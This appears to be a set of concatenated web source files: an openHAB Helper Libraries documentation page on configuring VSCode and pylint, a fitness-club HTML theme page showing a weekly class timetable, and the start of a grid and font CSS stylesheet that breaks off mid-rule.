<li class="toctree-l1"><a class="reference internal" href="../Guides/Rules.html">Rules</a></li> <li class="toctree-l1"><a class="reference internal" href="../Guides/Triggers.html">Triggers</a></li> <li class="toctree-l1"><a class="reference internal" href="../Guides/Logging.html">Logging</a></li> <li class="toctree-l1"><a class="reference internal" href="../Guides/Actions.html">Actions</a></li> <li class="toctree-l1"><a class="reference internal" href="../Guides/Metadata.html">Metadata</a></li> <li class="toctree-l1"><a class="reference internal" href="../Guides/Event Object Attributes.html">Event Object Attributes</a></li> <li class="toctree-l1"><a class="reference internal" href="../Examples/Examples.html">Examples</a></li> <li class="toctree-l1"><a class="reference internal" href="../Guides/But How Do I.html">But How Do I…?</a></li> </ul> <p class="caption"><span class="caption-text">Python</span></p> <ul> <li class="toctree-l1"><a class="reference internal" href="../Python/Reference.html">Reference</a></li> <li class="toctree-l1"><a class="reference internal" href="../Python/Core.html">Core</a></li> <li class="toctree-l1"><a class="reference internal" href="../Python/Community.html">Community</a></li> <li class="toctree-l1"><a class="reference internal" href="../Python/Examples.html">Examples</a></li> </ul> <p class="caption"><span class="caption-text">JavaScript</span></p> <ul> <li class="toctree-l1"><a class="reference internal" href="../JavaScript/Reference.html">Reference</a></li> </ul> <p class="caption"><span class="caption-text">Contributing</span></p> <ul> <li class="toctree-l1"><a class="reference internal" href="../Contributing/Coding Guidelines.html">Coding Guidelines</a></li> <li class="toctree-l1"><a class="reference internal" href="../Contributing/Writing Docs.html">Writing Documentation</a></li> </ul> </div> </div> </nav> <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"> <nav class="wy-nav-top" aria-label="top navigation"> <i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a href="../index.html">openHAB Helper Libraries</a> </nav> <div class="wy-nav-content"> <div class="rst-content style-external-links"> <div role="navigation" aria-label="breadcrumbs navigation"> <ul class="wy-breadcrumbs"> <li><a href="../index.html">Docs</a> &raquo;</li> <li>Setting up VSCode</li> <li class="wy-breadcrumbs-aside"> <a href="https://github.com/openhab-scripters/openhab-helper-libraries/">GitHub Repository</a> </li> </ul> <hr/> </div> <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"> <div itemprop="articleBody"> <div class="section" id="setting-up-vscode"> <h1>Setting up VSCode<a class="headerlink" href="#setting-up-vscode" title="Permalink to this headline">¶</a></h1> <p>The following steps will configure Visual Studio Code to recognize the Helper Libraries and provide examples of how to reduce the number of errors being displayed because VSCode does not have access to any openHAB packages.</p> <div class="section" id="env-file"> <h2>ENV File<a class="headerlink" href="#env-file" title="Permalink to this headline">¶</a></h2> <blockquote> <div><p>Create a <code class="docutils literal notranslate"><span class="pre">.env</span></code> file in the root of your openHAB conf directory (ex <code class="docutils literal notranslate"><span class="pre">{OH_CONF}/.env</span></code>) and add the following to it:</p> <div class="highlight-Text notranslate"><div class="highlight"><pre><span></span>PYTHONPATH=&quot;./automation/lib/python&quot; </pre></div> </div> <p>This will allow <code class="docutils literal notranslate"><span class="pre">pylint</span></code> to see any packages or modules in that directory and no longer show import errors for them.</p> </div></blockquote> </div> <div class="section" id="exclude-helper-libraries"> <h2>Exclude Helper Libraries<a class="headerlink" href="#exclude-helper-libraries" title="Permalink to this headline">¶</a></h2> <blockquote> <div><p>If you don’t already have an <code class="docutils literal notranslate"><span class="pre">{OH_CONF}/.vscode/settings.json</span></code> file, create it and add the following:</p> <div class="highlight-JSON notranslate"><div class="highlight"><pre><span></span><span class="p">{</span> <span class="nt">&quot;python.linting.ignorePatterns&quot;</span><span class="p">:</span> <span class="p">[</span> <span class="s2">&quot;**/automation/**/python/core/**/*.py&quot;</span><span class="p">,</span> <span class="s2">&quot;**/automation/**/python/community/**/*.py&quot;</span> <span class="p">]</span> <span class="p">}</span> </pre></div> </div> <p>This will tell <code class="docutils literal notranslate"><span class="pre">pylint</span></code> to ignore all files in the Helper Libraries’ <code class="docutils literal notranslate"><span class="pre">core</span></code> and <code class="docutils literal notranslate"><span class="pre">community</span></code> directories, greatly reducing the number of errors you will see because of openHAB packages it cannot import.</p> </div></blockquote> </div> <div class="section" id="pylint-directives"> <h2>pylint Directives<a class="headerlink" href="#pylint-directives" title="Permalink to this headline">¶</a></h2> <blockquote> <div><p>Lastly, you can use <code class="docutils literal notranslate"><span class="pre">pylint</span></code> directives if you want to disable the import error messages in your files for the openHAB packages that it cannot import.</p> <p>When importing packages or classes from openHAB:</p> <div class="highlight-python notranslate"><div class="highlight"><pre><span></span><span class="c1"># pylint: disable=import-error</span> <span class="kn">from</span> <span class="nn">org.openhab.core.library.items</span> <span class="kn">import</span> <span class="n">SwitchItem</span> <span class="c1"># pylint: enable=import-error</span> </pre></div> </div> <p>When importing <code class="docutils literal notranslate"><span class="pre">scope</span></code> from <code class="docutils literal notranslate"><span class="pre">core.jsr223</span></code>:</p> <div class="highlight-python notranslate"><div class="highlight"><pre><span></span><span class="c1"># pylint: disable=import-error, no-name-in-module</span> <span class="kn">from</span> <span class="nn">core.jsr223</span> <span class="kn">import</span> <span class="n">scope</span> <span class="c1"># pylint: enable=import-error, no-name-in-module</span> </pre></div> </div> </div></blockquote> </div> </div> </div> </div> <footer> <div align="right"> <br/> <a href="https://github.com/openhab-scripters/openhab-helper-libraries/blob/master/Sphinx/Getting Started/VS Code.rst" class="fa fa-github"> Edit on GitHub</a> </div> <hr/> <div role="contentinfo"> <p> &copy; Copyright 2019, Contributors to the openHAB Scripters project </p> </div> Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/rtfd/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. </footer> </div> </div> </section> </div> <script type="text/javascript"> jQuery(function () { SphinxRtdTheme.Navigation.enable(false); }); </script> </body> </html>
wp-content/themes/01-Sources/classes.html
mautd29388/mtheme
<!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]--> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>Fitness - Classes</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <link rel="stylesheet" href="css/bootstrap.css"> <link rel="stylesheet" href="css/bootstrap-theme.min.css"> <link rel="stylesheet" href="css/jqueryui/jquery-ui-1.10.3.custom.css"> <link rel="stylesheet" href="css/main.css"> <script src="js/vendor/modernizr-2.6.2-respond-1.1.0.min.js"></script> </head> <body> <!--[if lt IE 7]> <p class="chromeframe">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> or <a href="http://www.google.com/chromeframe/?redirect=true">activate Google Chrome Frame</a> to improve your experience.</p> <![endif]--> <div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=1468366216712571"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <div class="header-holder"> <div class="container"> <div class="row header"> <div class="col-md-2 logo align-c"> <div class="inner-top-bottom-20"> <h1 class="no-margin">Fitness</h1> </div> <!-- /.inner-top-bottom-10 --> </div> <!-- /.col-md-2 logo --> <div class="col-md-10 col-md-xs-12 navigation-holder"> <div class="inner-top-bottom-10 "> <span class="open-navigation js-open-navigation"> Navigation </span> <ul class="main-navigation"> <li class="bread"><a href="">Classes</a></li> <li><a href="home.html">HOME</a></li> <li><a href="store1.html">STORE</a></li> <li><a href="trainers.html">TRAINERS</a></li> <li class="active"><a href="classes.html">CLASSES</a></li> <li><a href="plans.html">PLANS</a></li> <li><a href="blog.html">BLOG</a></li> <li><a href="contacts.html">CONTACT</a></li> </ul> </div> <!-- /.inner-top-bottom-10 --> </div> <!-- /.col-md-10 align-r --> </div> <!-- /.row --> </div> <!-- /.container --> </div> <!-- /.header-holder absolute --> <!-- Modal --> <div class="modal fade" id="class-modal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button> </div> <div class="modal-body"> <div class="row"> <div class="col-md-8 col-sm-12 col-xs-12"> <div class="inner-left-60 inner-60-sm inner-10-xs"> <h2>BODYBUILDING</h2> <ol class="tags"> <li><span class="meta">45 minutes</span> <i class="fa fa-clock-o"></i>DURATION</li> <li><span class="meta">Class#3</span> <i class="fa fa-map-marker"></i>LOCATION</li> <li><span class="meta">Jim Leyland</span> <i class="fa fa-user"></i>TRAINER</li> <li> <div class="training-progress"> <div class="bubble yellow">&nbsp;</div> <div class="bubble yellow">&nbsp;</div> <div class="bubble yellow">&nbsp;</div> <div class="bubble green">&nbsp;</div> <div class="bubble green">&nbsp;</div> <div class="bubble green">&nbsp;</div> <div class="bubble grey">&nbsp;</div> <div class="bubble grey">&nbsp;</div> <div class="bubble grey">&nbsp;</div> </div> <!-- /.training-progress --> <i class="fa fa-bar-chart-o"></i>LEVEL </li> </ol> </div> </div> <!-- /.col-md-8 --> <div class="col-md-4 col-xs-12 col-sm-12 align-c hidden-xs hidden-sm"> <div class="image-centered pull-up-70"> <img src="img/image_bodybuilding.png" class="img-responsive" alt="" title="" /> </div> </div> <!-- /.col-md-4 --> </div> <!-- /.row --> <div class="inner-60 inner-60-sm inner-10-xs"> <p>BODYATTACK is the sports-inspired cardio workout for building strength and stamina. This high-energy interval training class combines athletic aerobic movements with strength and stabilization exercises. Dynamic instructors and powerful music motivate everyone towards their fitness goals - from the weekend athlete to the hard-core competitor!</p> </div> </div> </div> <!-- /.modal-content --> </div> <!-- /.modal-dialog --> </div> <!-- /.modal --> <div class="bannercontainer"> <div class="banner-static"> <img src="img/slider/slide_2.jpg" alt="" title=""> </div> <!-- /.banner --> </div> <!-- /.bannercontainer --> <div class="container pull-up-148 upper-content"> <div class="row"> <div class="col-md-12"> <ul class="horizontal-timetable timetable"> <li class="time"> <div class="data"> <span class="title">PILATES</span> <a href="">02<span>:</span>35 </a> <!-- /.additional-data --> </div> <!-- /.data --> </li> <li class="time"> <div class="data"> <span class="title">YOGA</span> <a href="">04<span>:</span>00 </a> <!-- /.additional-data --> </div> <!-- /.data --> </li> <li class="time"> <div class="data"> <span class="title">ZUMBA</span> <a href="">05<span>:</span>45 </a> <!-- /.additional-data --> </div> <!-- /.data --> </li> <li class="time"> <div class="data"> <span class="title">ZUMBA</span> <a href="">05<span>:</span>45 </a> <!-- /.additional-data --> </div> <!-- /.data --> </li> </ul> </div> <!-- /.col-md-12 --> </div> <!-- /.row --> </div> <!-- /.container --> <div class="container search-class"> <div class="row"> <div class="col-md-12 pull-down-70"> <h1>CLASSES</h1> <div class="border-red"></div> <!-- /.border-red --> </div> <!-- /.col-md-12 --> </div> <!-- /.row --> <div class="row"> <div class="col-md-6 col-sm-6 col-xs-16 pull-down-60"> <p>I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me and the</p> </div> <!-- /.col-md-6 --> <div class="col-md-6 col-sm-6 col-xs-12 align-r pull-down-60"> <div class="inline-block js-filter-days-classes"> <a href="" data-value="TODAY">TODAY</a> <a class="active" href="" data-value="ALL">THIS WEEK</a> <select class="js-filter-classes-type"> <option value="all">ALL</option> <option value="pilates">PILATES</option> <option value="kickboxing">KICKBOXING</option> <option value="spinning">SPINNING</option> <option value="open-family">OPEN FAMILY</option> </select> </div> <!-- /.inline-block js-filter-days-classes --> </div> <!-- /.col-md-6 --> </div> <!-- /.row --> <div class="row"> <div class="col-md-12"> <div class="table-responsive"> <table class="schedule pull-down-125 width-100"> <tr class="form-headline"> <td></td> <td class="day-filter" data-day="MONDAY">MONDAY</td> <td class="day-filter" data-day="TUESDAY">TUESDAY</td> <td class="day-filter" data-day="WEDNESDAY">WEDNESDAY</td> <td class="day-filter" data-day="THURSTDAY">THURSTDAY</td> <td class="day-filter" data-day="FRIDAY">FRIDAY</td> <td class="day-filter" data-day="SATURDAY">SATURDAY</td> <td class="day-filter" data-day="SUNDAY">SUNDAY</td> </tr> <tr> <td class="vertical-middle">7:00</td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="zumba" class="single-class blue">ZUMBA</a></td> <td class="day-filter" data-day="TUESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="water-fitness" class="single-class turq">WATER FITNESS</a></td> <td class="day-filter" data-day="WEDNESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="open-family" class="single-class brown">OPEN FAMILY</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="athletic-step" class="single-class green">ATHLETIC STEP</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="kickboxing" class="single-class red">KICKBOXING</a> </td> <td class="day-filter" data-day="THURSTDAY"></td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="spinning" class="single-class pink">SPINNING</a></td> <td class="day-filter" data-day="SATURDAY"></td> <td class="day-filter" data-day="SUNDAY"></td> </tr> <tr> <td class="vertical-middle">8:20</td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="spinning" class="single-class pink">SPINNING</a></td> <td class="day-filter" data-day="TUESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a></td> <td class="day-filter" data-day="WEDNESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a></td> <td class="day-filter" data-day="THURSTDAY"></td> <td class="day-filter" data-day="FRIDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="athletic-step" class="single-class green">ATHLETIC STEP</a></td> <td class="day-filter" data-day="SATURDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a></td> <td class="day-filter" data-day="SUNDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a></td> </tr> <tr> <td class="vertical-middle">11:30</td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="open-family" class="single-class brown">OPEM FAMILY</a></td> <td class="day-filter" data-day="TUESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="zumba" class="single-class blue">ZUMBA</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="athletic-step" class="single-class green">ATHLETIC STEP</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="spinning" class="single-class pink">SPINNING</a></td> <td class="day-filter" data-day="WEDNESDAY"></td> <td class="day-filter" data-day="THURSTDAY"></td> <td class="day-filter" data-day="FRIDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="water-fitness" class="single-class turq">WATER FITNESS</a></td> <td class="day-filter" data-day="SATURDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="kickboxing" class="single-class red">KICKBOXING</a> </td> <td class="day-filter" data-day="SUNDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="kickboxing" class="single-class red">KICKBOXING</a> </td> </tr> <tr> <td class="vertical-middle">01:00</td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a></td> <td class="day-filter" data-day="TUESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="spinning" class="single-class pink">SPINNING</a></td> <td class="day-filter" data-day="WEDNESDAY"></td> <td class="day-filter" data-day="THURSTDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="athletic-step" class="single-class green">ATHLETIC STEP</a></td> <td class="day-filter" data-day="FRIDAY"></td> <td class="day-filter" data-day="SATURDAY"></td> <td class="day-filter" data-day="SUNDAY"></td> </tr> <tr> <td class="vertical-middle">04:20</td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="zumba" class="single-class blue">ZUMBA</a></td> <td class="day-filter" data-day="TUESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a></td> <td class="day-filter" data-day="WEDNESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="open-family" class="single-class brown">OPEN FAMILY</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="athletic-step" class="single-class green">ATHLETIC STEP</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="kickboxing" class="single-class red">KICKBOXING</a> </td> <td class="day-filter" data-day="THURSTDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="spinning" class="single-class pink">SPINNING</a></td> <td class="day-filter" data-day="FRIDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="water-fitness" class="single-class turq">WATER FITNESS</a></td> <td class="day-filter" data-day="SATURDAY"></td> <td class="day-filter" data-day="SUNDAY"></td> </tr> <tr> <td class="vertical-middle">07:00</td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="spinning" class="single-class pink">SPINNING</a></td> <td class="day-filter" data-day="TUESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a></td> <td class="day-filter" data-day="WEDNESDAY"></td> <td class="day-filter" data-day="THURSTDAY"></td> <td class="day-filter" data-day="FRIDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a></td> <td class="day-filter" data-day="SATURDAY"></td> <td class="day-filter" data-day="SUNDAY"></td> </tr> <tr> <td class="vertical-middle">08:30</td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="zumba" class="single-class blue">ZUMBA</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="athletic-step" class="single-class green">ATHLETIC STEP</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="spinning" class="single-class pink">SPINNING</a></td> <td class="day-filter" data-day="TUESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="water-fitness" class="single-class turq">WATER FITNESS</a></td> <td class="day-filter" data-day="WEDNESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="open-family" class="single-class brown">OPEN FAMILY</a></td> <td class="day-filter" data-day="THURSTDAY"></td> <td class="day-filter" data-day="FRIDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="kickboxing" class="single-class red">KICKBOXING</a> </td> <td class="day-filter" data-day="SATURDAY"></td> <td class="day-filter" data-day="SUNDAY"></td> </tr> <tr> <td class="vertical-middle">09:00</td> <td class="day-filter" data-day="MONDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="yoga" class="single-class black">YOGA</a></td> <td class="day-filter" data-day="TUESDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="pilates" class="single-class orange">PILATES</a> <a href="" data-toggle="modal" data-target="#class-modal" data-class="spinning" class="single-class pink">SPINNING</a></td> <td class="day-filter" data-day="WEDNESDAY"></td> <td class="day-filter" data-day="THURSDAY"></td> <td class="day-filter" data-day="FRIDAY"><a href="" data-toggle="modal" data-target="#class-modal" data-class="athletic-step" class="single-class green">ATHLETIC STEP</a></td> <td class="day-filter" data-day="SATURDAY"></td> <td class="day-filter" data-day="SUNDAY"></td> </tr> </table> </div> <!-- /.table-responsive --> </div> <!-- /.col-md-12 --> </div> <!-- /.row --> </div> <!-- /.container --> <div class="footer-grey"> <div class="border-gray pull-down-140"></div> <!-- /.border-gray --> <div class="container pull-down-30 footer"> <div class="row push-down-20"> <div class="col-xs-12 col-md-3"> <h5 class="push-down-25">NEWSLETTER</h5> <p>Maecenas vel diam ultrices, vehicula libero ut, mattis risus. Vivamus consequat consectetur venenatis. Etiam id elit ante.</p> <form class="form-inline pull-down-40 newsletter-form" role="form"> <div> <input type="email" class="form-control" id="exampleInputEmail2" placeholder="Enter email"> <button type="submit" class="main-button default-input icon-margin-right"> <i class="fa fa-angle-right"></i>SUBSCRIBE </button> </div> </form> <div class="clearfix"></div> <!-- /.clearfix --> <div class="social-icon"> <a href=""><i class="fa fa-twitter"></i></a> <a href=""><i class="fa fa-facebook"></i></a> </div> </div> <!-- /.col-xs-12 --> <div class="col-xs-12 col-md-3"> <h5 class="push-down-25">INSTAGRAM</h5> <div id="instafeed" class="instafeed push-down-10"></div> </div> <!-- /.col-xs-12 --> <div class="col-xs-12 col-md-3"> <h5 class="push-down-25">LOCATIONS</h5> <div class="row location"> <div class="col-xs-1"> <i class="fa fa-map-marker"></i> </div> <!-- /.col-xs-1 --> <div class="col-xs-10"> <a href="">25th street, New York City, BY 10010 Phone: 040 859 358</a> </div> <!-- /.col-xs-11 --> </div> <!-- /.row --> <div class="row location"> <div class="col-xs-1"> <i class="fa fa-map-marker"></i> </div> <!-- /.col-xs-1 --> <div class="col-xs-10"> <a href="">25th street, New York City, BY 10010 Phone: 040 859 358</a> </div> <!-- /.col-xs-11 --> </div> <!-- /.row --> <div class="row location"> <div class="col-xs-1"> <i class="fa fa-map-marker"></i> </div> <!-- /.col-xs-1 --> <div class="col-xs-10"> <a href="">25th street, New York City, BY 10010 Phone: 040 859 358</a> </div> <!-- /.col-xs-11 --> </div> <!-- /.row --> </div> <!-- /.col-xs-12 --> <div class="col-xs-12 col-md-3"> <h5 class="push-down-25">RECENT COMMENTS</h5> <div class="row recent-comment"> <div class="col-xs-1"> <i class="fa fa-comment"></i> </div> <!-- /.col-xs-1 --> <div class="col-xs-10"> <a href="">Lorem ipsum dolor sit amet, consectetur adipisicing elitdoloribus nobis ducimus dolorem autem.</a> </div> <!-- /.col-xs-11 --> </div> <!-- /.row --> <div class="row recent-comment"> <div class="col-xs-1"> <i class="fa fa-comment"></i> </div> <!-- /.col-xs-1 --> <div class="col-xs-10"> <a href="">Lorem ipsum dolor sit amet, consectetur adipisicing elitdoloribus nobis ducimus dolorem autem.</a> </div> <!-- /.col-xs-11 --> </div> </div> <!-- /.col-xs-12 --> </div> <!-- /.row --> </div> <!-- /.row --> </div> <!-- /.container --> <div class="container"> <div class="row"> <div class="col-md-6 col-xs-6 col-sm-6 copyright align-l"> <div class="inner-top-bottom-30"> <p>&copy;FITNESS THEME 2013</p> </div> <!-- /.inner-top-bottom-30 --> </div> <!-- /.col-md-12 --> <div class="col-md-6 col-xs-6 col-sm-6 copyright align-r"> <div class="inner-top-bottom-30"> <p> DESIGNED BY <strong>MUNFACTORY</strong> </p> </div> <!-- /.inner-30 --> </div> <!-- /.col-md-12 --> </div> <!-- /.row --> </div> <!-- /.container --> <script src="bower_components/jquery/jquery.js"></script> <script src="https://maps.googleapis.com/maps/api/js?v=3.exp&amp;sensor=false"></script> <script src="js/build/production.js"></script> </body> </html>
docs/logos/2.0.1/tests/BOM/assets/css/gui.css
WestpacCXTeam/GUI-source
/*! _colors v2.0.1 */ /* * SETTINGS */ .written-by { content: 'Dominik Wilkowski, Justin Spencer, Kate T MacDonald, Marita Purins, Daphne Bourne'; color: #BADA55; } /*! _fonts v2.0.1 */ /* * SETTINGS */ /* * SETTINGS */ @font-face { font-family: 'stag'; src: url('../font/Stag-Light.eot'); src: url('../font/Stag-Light.eot?#iefix') format('embedded-opentype'), url('../font/Stag-Light.woff') format('woff'), url('../font/Stag-Light.ttf') format('truetype'), url('../font/Stag-Light.svg#Stag-Light') format('svg'); font-weight: 300; font-style: normal; } @font-face { font-family: 'stag'; src: url('../font/Stag-Medium.eot'); src: url('../font/Stag-Medium.eot?#iefix') format('embedded-opentype'), url('../font/Stag-Medium.woff') format('woff'), url('../font/Stag-Medium.ttf') format('truetype'), url('../font/Stag-Medium.svg#Stag-Medium') format('svg'); font-weight: 500; font-style: normal; } .body-font { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } .brand-font { font-family: "stag", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif; } /*! _grid v2.0.0 */ .clearfix:before, .clearfix:after, .container-fluid:before, .container-fluid:after, .container:before, .container:after, .row:before, .row:after { content: " "; display: table; } .clearfix:after, .container-fluid:after, .container:after, .row:after { clear: both; } *, *:after, *:before { box-sizing: border-box; } .container, .container-fluid { margin-right: auto; margin-left: auto; padding-left: 12px; padding-right: 12px; } @media (min-width: 768px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .container { padding-left: 12px; padding-right: 12px; } } @media (min-width: 768px) { .container { width: 744px; } } @media (min-width: 992px) { .container { width: 960px; } } @media (min-width: 1200px) { .container { width: 1164px; } } @media (min-width: 768px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .container-fluid { padding-left: 12px; padding-right: 12px; } } .row { margin-left: -6px; margin-right: -6px; } @media (min-width: 768px) { .row { margin-left: -12px; margin-right: -12px; } } @media (min-width: 992px) { .row { margin-left: -12px; margin-right: -12px; } } @media (min-width: 1200px) { .row { margin-left: -12px; margin-right: -12px; } } .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { position: relative; min-height: 1px; padding-left: 6px; padding-right: 6px; } @media (min-width: 768px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } @media (min-width: 992px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-md-1, .col-md-10, .col-md-11, .col-md-12, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-sm-1, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { padding-left: 12px; padding-right: 12px; } } .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9 { float: left; } .col-xs-12 { width: 100%; } .col-xs-11 { width: 91.66666667%; } .col-xs-10 { width: 83.33333333%; } .col-xs-9 { width: 75%; } .col-xs-8 { width: 66.66666667%; } .col-xs-7 { width: 